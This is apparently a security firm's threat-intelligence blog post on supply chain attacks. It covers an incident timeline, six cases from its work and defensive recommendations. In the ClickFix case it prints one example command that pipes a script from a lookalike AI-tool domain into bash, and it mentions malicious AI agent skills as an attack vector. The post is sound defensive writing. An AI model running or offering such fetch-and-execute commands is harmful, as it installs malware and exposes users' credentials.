When the threat enters through the vendor, detection starts too late. Here is what we saw in the past twelve months — and what it demands from defenders.

The perimeter is dead — and the supply chain buried it.
Just over a month ago, we were invited by the Cyber Security and Technology Crime Bureau (CSTCB) of the Hong Kong Police Force to share our views on supply chain attacks with the industry.
Whilst ransomware and email compromise remain common intrusion vectors, our reflection on the past year of incidents flags a consistently emerging pattern; organisations are comparatively more prepared in responding to these ‘internal’ -type incidents.
Responding to an incident is not just about identifying the root cause and closing the ticket. What matters equally — sometimes more — is guiding the business back to safe operations and putting practical controls in place to prevent the next one. That is the part that rarely gets written about. This post is our attempt to change that.
We ask one question: when an attack enters through a trusted third party, how different does the response need to be?
Part 1: How We Got Here
A Timeline of Supply Chain Exploitation
Supply chain exploitation is not a new technique. What has changed in recent years however, is the surface area, the speed, and the stealth.
The canonical playbook — compromise a managed service provider (MSP), trojanise a software update, fan out to the customer base — dates back to at least 2013. ASUS Live Update (2019). SolarWinds SUNBURST (2020). Kaseya VSA (2021). 3CX (2023). XZ Utils (2024). The list is long, and it keeps growing.
What has changed is the target profile. Attackers are no longer just going after MSPs and software vendors. They are targeting the productivity tools your developers trust implicitly, the AI assistants with access to your code and cloud credentials, and the API integrations quietly holding your customers’ data. The software update mechanism is now just one of many trusted channels that can be weaponised.
| Year | Incident | Why It Mattered |
| 2017 | NotPetya | Weaponised software update — no malicious traffic before detonation; lateral movement was complete before EDR fired. |
| 2020 | SolarWinds | SUNBURST backdoor mimicked legitimate telemetry; dwell time ~14 months. |
| 2021 | Log4j | A logging library embedded invisibly in thousands of applications; no file drop, no binary. |
| 2023 | X_TRADER / 3CX | Supply chain attack feeding a second supply chain attack; binary was legitimately signed and widely whitelisted. |
| 2024 | Xz-utils | Backdoor introduced over months by a credible contributor; caught only by an engineer noticing unusual SSH performance. Zero security alerts. |
| 2024 | Salesloft Drift | OAuth tokens stolen from a SaaS integration; attacker walked into Salesforce with a pre-authorised token — no failed login alerts. |
| 2025 | Shai-Hulud / NPM | Self-propagating malware distributed via compromised NPM accounts; installed by a routine npm install. |
| 2025 | Notepad++ Backdoor | APT Lotus Blossom compromised the software update path; binary was signed, installer was legitimate. |
| 2026 | Exposed API Keys | Google Cloud keys exposed publicly; abuse looked like legitimate API usage, detected only on a billing spike. |
| 2026 | OpenClaw | Malicious agent skills execute inside a trusted AI process with user-level privileges; no clear boundary between normal and malicious activity. |
| 2026 | CPUID | The official website for the software product compromised to deliver an installer that delivers malware. |
The Attack Surface Has Expanded
Initial access no longer requires compromising your perimeter directly. Incidents increasingly originate from a user workstation – or from infrastructure entirely outside your environment. The traditional model of “breach perimeter → move laterally” has been replaced by something harder to detect: “arrive pre-authorised → operate normally.”
As we have learnt working with clients across the region, these are scenarios most organisations are not prepared to detect, contain, or communicate.
| Vector | Description |
| SaaS Integrations | Over-privileged OAuth tokens; shadow connections no one audits |
| Software Dependencies | Malicious packages in NPM, PyPI, Maven |
| Open-Source Ecosystems | Systemic vulnerabilities in foundational libraries |
| CI/CD Pipelines | Compromised build runners and GitHub Actions workflows |
| External API Reliance | Unmanaged API tokens scattered across developer machines and repositories |
| Human/Contractor Access | External staff with privileged internal access, outside your MDM and training programme Software vendors that host business data outside of the environment |
| AI/LLM Tools | Model poisoning, malicious agent skills, prompt injection |
Part 2: Six Cases From the Ground
The following six cases are drawn directly from our operations over the past twelve months. Some are incidents we responded to. Others surfaced through continuous threat intelligence operations. In every one, the entry point was a trusted third party – and in every one, existing assumptions about detection failed in at least one important way.
Case 1: The Docker Registry That Should Not Have Been There
During a routine sweep of exposed internet infrastructure, we found a vendor’s Docker registry — publicly accessible, no authentication required — had been misconfigured and left open. The repository names made the client relationships immediately obvious: they referenced client names and internal project codenames. The kind of naming convention that only makes sense if you are working inside the organisation.
What we found was operational infrastructure: environment configurations, secrets, and AWS credentials with sufficient privilege for full environment access — with pivot paths reaching the vendor’s downstream clients. Based on the data, we could not determine how long the registry had been exposed. Neither did the vendor. Determining whether a threat actor had already found and exploited it took the affected clients substantial effort to investigate.
What we learnt:
- Discovery came from external threat intelligence, not internal detection. The affected clients had no telemetry that would have surfaced this.
- Vendors are routinely excluded from security assessment scope. Their infrastructure — registries, toolchains, dev environments — is a blind spot by default.
- Vendor access to your environment creates an obligation to monitor their security posture, not just their SLA performance.
If your vendor’s environment was breached right now, how long would it take you to find out?
Case 2: API Key Exposure — When the Bill Is the Alert
The first signal was not a security alert. It was a billing notification.
An organisation’s AI service costs had spiked without explanation. When they investigated, it was found that an API key had been exposed in a public GitHub repository for over a week. Needless to say, a threat actor took it for various purposes.
The key was rotated immediately. But the harder questions were : is it possible to detect this, and who is going to pay?
What we learnt:
- The breach was discovered through a financial anomaly, not a security control. Without the cost spike, no one would have noticed.
- Determining the scope of what a stolen key accessed is significantly harder than rotating it. Baselining normal API usage before an incident is not optional.
- An organisation that cannot enumerate its API keys cannot determine the blast radius when one is stolen.
If your organisation suffered an AI API key exposure today, how long would it take you to find it — and how would you determine what was accessed?
Case 3: Third-Party Data on the Dark Web — Fear as a Product
Through our continuous dark web monitoring, we identified a post on a threat actor forum listing what appeared to be data belonging to one of our clients.
We downloaded and analysed the sample. Our client began tracing the data’s origin and eventually found that the data had come from a campaign website a vendor had built using the client’s static information. The site was just scraped, and nothing sensitive had been exposed.
On a threat actor forum, that distinction does not appear in the listing.
What we learnt:
- The dark web is a market for fear as much as for data. Anyone can claim a breach. The burden of proof falls on the victim to disprove it — not on the threat actor to prove it.
- The data transfer to the vendor was authorised. The vendor’s decision to publish it on an unmanaged public site was not. That distinction carries legal and reputational weight — but threat actor forums do not make it.
- Fast triage matters. Same-day detection allowed us to scope and close the case quickly. Without it, the client would have faced weeks of uncertainty.
Do you know what public-facing infrastructure your vendors have built using your data — and who is responsible for reviewing it?
Case 4: Notepad++ — A Trusted Channel, Weaponised
In February 2026, Notepad++ confirmed what threat hunters had suspected: APT Lotus Blossom — a threat actor with a long history of targeting Southeast Asian government and critical infrastructure — had compromised the application’s software update mechanism.[1]
The mechanics were clean. A legitimate NSIS installer delivered a malicious DLL (log.dll), sideloaded by a renamed Bitdefender component (BluetoothService.exe). The binary made outbound connections to a C2 IP address that had appeared in prior Lotus Blossom campaigns — but without active correlation against current telemetry, that history was invisible.
From a security operations standpoint, this means a targeted threat hunting for affected machines, we were hunting for legitimately signed, whitelisted software — approximately the worst possible hunting surface.
What we learnt:
- Signed binaries arriving through trusted update channels are not, by themselves, evidence of integrity. Behavioural detection — unexpected process spawns, novel outbound connections, new persistence mechanisms — is the only reliable signal.
- Known-malicious IOCs are only useful if matched against current telemetry. Archiving threat intelligence that is never operationalised is not threat intelligence.
- Nation-state supply chain compromises targeting enterprise software are not edge cases. They are a persistent, structural risk that demands persistent, structural detection.
Case 5: Salesforce — The Database of Databases
Salesforce is not how most organisations think about their crown jewels. But consider what it actually contains: structured records of customers, pipeline, contracts, and — via integrations — potentially data from every system your sales and service teams touch. Then consider that Salesforce is federated into a significant share of most organisations’ vendor ecosystems.
When intelligence on a major Salesforce-related breach campaign emerged, we did not wait for vendor notification. We ran OSINT and threat hunting against the confirmed victim list, cross-referenced it against our clients’ vendor relationships and Salesforce exposure, and flagged downstream risk directly to affected clients — often before they had heard anything from the affected vendors themselves.
The access mechanism was OAuth token theft. No failed logins. No brute-force signal. No password reset. The attacker arrived pre-authorised, using a credential that looked exactly like every other legitimate session.
What we learnt:
- OAuth token theft is authentication-transparent. The only detection surface is behavioural: unusual geolocations, access at atypical hours, unexpected data exports.
- The downstream notification burden from a SaaS breach can extend well beyond the directly affected organisation. If a vendor’s Salesforce held your customers’ data, the notification obligation may fall on you.
- Proactive OSINT and threat hunting — not vendor notification — was how our clients first learnt of their exposure. Do not assume the vendor will tell you first.
Which of your SaaS integrations hold your customers’ data — and would you know within 24 hours if an OAuth token for one of them was stolen?
Case 6: InstallFix — When the AI Tool Is the Threat
The ClickFix lure is perhaps the perfect phishing scenario for an uninformed user : a browser-based prompt, visually indistinguishable from legitimate installation documentation, instructing them to run a command in their terminal.
The result was an infostealer deployed directly from the user’s workstation. No perimeter control fired. No binary arrived from a remote attacker. The user executed it themselves.
The technique is not new — ClickFix has been observed as a delivery mechanism since at least 2024. What has changed is the targeting. Threat actors are now building convincing lookalike sites specifically for the AI developer tools engineers trust most: Cursor, Claude Code, GitHub Copilot. The install commands are often indistinguishable from the real documentation:
curl https://backdoored-claude.lol/install.sh | bash
This is not a failure of endpoint detection. It is deliberate exploitation of user trust in documented install patterns. The lure succeeds precisely because it looks exactly like the real thing.
What we learnt:
- ClickFix lures succeed by precisely mimicking legitimate install flows. “Don’t click suspicious links” is insufficient when the lure is indistinguishable from official documentation.
- AI tools are routinely granted extensive permissions — files, email, calendar, code repositories, cloud credentials — making them high-value targets for initial access, whether through credential theft or malicious installation.
- Policy lag is itself an attack surface. If your organisation has not defined which AI tools are permitted and how they should be installed, employees will use whatever they find — and follow the instructions they find.
If an employee ran a malicious AI tool installer today, how quickly would your SOC detect it — and how would you know which credentials and data to treat as compromised?
Part 3: How We Need to Respond Differently
Our Existing Assumptions Are Broken
Every case above had one thing in common: trusted entry point. A signed update package, a legitimate API key, an authorised data transfer, an OAuth token, or an installation documentation that told the user to do it.
In every case, the detection that mattered was behavioural — not signature-based. In some, it was external threat intelligence: we found the exposure before the attacker did, or before the organisation knew. Dwell time across these cases ranged from the same day to over fourteen months.
This demands a different posture. Not just different tools — different assumptions.
Control — Know What Is Actually In Your Ecosystem
You cannot protect what you cannot enumerate. Start with a living inventory of:
- All third-party code dependencies, including transitive ones
- All SaaS applications with access to your environment
- All OAuth integrations — including the shadow ones your IT team does not know about
- All AI tools your employees are using — sanctioned and unsanctioned
- All contractor and vendor access, including dormant accounts
- All API keys in active use, and what they can access
Apply data-based risk tiering: classify vendors by blast radius (what data and systems they can reach), not just compliance paperwork. Ask your highest-tier vendors to demonstrate their supply chain controls — not just sign an attestation.
Then run the 24-hour test: could you determine, within 24 hours, whether a specific vendor had been breached and what data they hold? If the answer is no, that is your first priority.
Visibility — Seeing Through Trusted Channels
The single most common gap we find is the absence of baselines. You cannot alert on anomalies you have never defined. Before writing detection rules, establish what normal looks like for:
- Third-party authentication — geographies, timing, volume
- API key usage — call patterns, geolocations, scope, timing
- OAuth token behaviour — which integrations access what, when, and from where
- Data egress through SaaS and AI channels — volume, destination, timing
Response — What If the Vendor Is the Problem?
Most incident response playbooks assume a clean model: external attacker crosses the perimeter, response team contains and eradicates. Supply chain incidents break this. The vendor is not the responder — the vendor is part of the blast radius.
New playbooks are required:
- Credential rotation at scale: If a vendor is compromised, every credential they could have touched needs rotation — across all systems, within hours. Have you tested this? Do you know how long it takes?
- Vendor access suspension with continuity planning: If you need to cut off a vendor immediately, what breaks? What is the fallback? These decisions should be made in advance, not under pressure.
- Post-compromise ecosystem audit: Trigger on suspicion — not confirmation. Assume lateral movement until proven otherwise.
Run the tabletop: your most critical SaaS provider calls to say they were breached last month. Who picks up the phone? What happens in the first hour? If you have not rehearsed it, you do not know the answer.
Conclusion: The Perimeter Is Not Coming Back
The six cases above are not exceptional. They are representative.
Supply chain attacks are now the dominant initial access vector across the incidents we respond to — not because the techniques are new, but because defenders have not caught up to the reality that the perimeter no longer defines the boundary of trust. Trusted channels are the attack surface. Third-party access is the entry point. Dwell time is measured in months.
We posit that as these forms of attacks will rise exponentially, particularly as threat actors increasingly leverage AI to facilitate their attacks. AI-assisted tooling is already beginning to automate what previously required significant reconnaissance effort — mapping vendor relationships, identifying integration gaps, surfacing over-privileged third-party access at scale. Whilst this is yet to materialise at scale, we anticipate the scale and speed of these attacks will change rapidly as new model releases emerge.
The organisations that are best positioned are not the ones with the most controls. They are the ones that know exactly what is in their ecosystem, have baselined normal behaviour, and have rehearsed their response to a vendor compromise — before it happens.
The supply chain is the perimeter now. It is time to defend it like one.
Recommendations
Preventive
- Ecosystem inventory: Maintain a living inventory of all third-party code dependencies, SaaS applications, OAuth integrations, AI tools, and contractor access.
- API key governance: Implement pre-commit hooks to prevent secrets entering repositories; enforce short TTLs and automatic rotation; audit keys in active use regularly.
- Vendor risk tiering: Classify vendors by blast radius (data access and connectivity scope), not just compliance status.
- SaaS OAuth audit: Review all connected applications for scope, last-used date, and whether the business use case still exists. Revoke shadow integrations.
- AI tool policy: Define explicitly which AI tools are permitted and what permissions they hold. Review agent skill marketplaces for scope creep.
Detective
- Baseline trusted channels: Establish normal third-party behaviour — authentication geographies, API call volumes, data egress patterns, OAuth token usage — before writing detection rules.
- Endpoint monitoring post-update: Alert on unexpected process spawns, outbound connections, or persistence mechanisms established by signed update agents.
- API key and OAuth anomalies: Alert on keys used from new IPs, ASNs, or geographies; volume spikes; usage outside agreed business hours.
- Data egress monitoring: Alert on new external destinations in proxy/DNS logs; volume spikes to cloud storage; data leaving through AI API channels.
- Dark web monitoring: Monitor for your organisation, key vendors, and contractors appearing in threat actor forums, credential dumps, or sale listings.
- Supply chain threat intelligence: Subscribe to feeds tracking software supply chain compromises, exposed repositories, and malicious package reports. Map intelligence to your actual dependency inventory.
Further Information
We are committed to protecting our clients and the wider community against the latest threats through our dedicated research and the integrated efforts of our red team, blue team, incident response, and threat intelligence capabilities. Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.